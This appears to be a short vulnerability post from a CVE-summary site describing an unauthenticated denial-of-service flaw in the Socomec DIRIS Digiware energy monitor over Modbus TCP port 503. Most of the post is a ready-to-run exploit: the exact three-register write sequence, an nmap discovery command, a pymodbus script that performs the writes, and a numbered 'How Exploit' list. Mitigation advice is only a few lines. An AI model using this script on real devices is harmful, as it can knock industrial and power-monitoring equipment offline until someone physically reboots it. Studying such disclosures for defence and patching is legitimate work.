Listen to this Post
The vulnerability exploits the Modbus RTU over TCP service on port 503. An unauthenticated attacker sends a specific sequence of Write Single Register (function code 6) requests, reprogramming the device’s Modbus address to induce a denial-of-service state. The attack sequence is: first, write value 1000 to register 58112, signaling an impending config change. Second, write the desired rogue Modbus address to register 29440. Finally, write value 161 to register 57856 to commit the change. This illegitimate reconfiguration corrupts the device’s communication stack, causing it to stop responding to legitimate Modbus queries and requiring a physical reboot to restore functionality.
DailyCVE Form:
Platform: Socomec DIRIS Digiware
Version: 1.6.9
Vulnerability: Denial of Service
Severity: Critical
Date: 12/01/2025
Prediction: 01/15/2026
What Undercode Say:
sudo nmap -p 503 --script modbus-discover <target_ip>
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('<target_ip>', port=503)
client.write_register(58112, 1000)
client.write_register(29440, <new_addr>)
client.write_register(57856, 161)
tcpdump -i any port 503 -w modbus_attack.pcap
How Exploit:
1. Identify target on port 503.
2. Send Write Register to 58112=1000.
3. Send Write Register to 29440=.
4. Send Write Register to 57856=161.
5. Device stops responding.
Protection from this CVE:
Block port 503.
Network segmentation.
Apply vendor patch.
Use access control lists.
Impact:
Complete service disruption.
Requires physical reboot.
Operational technology halted.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
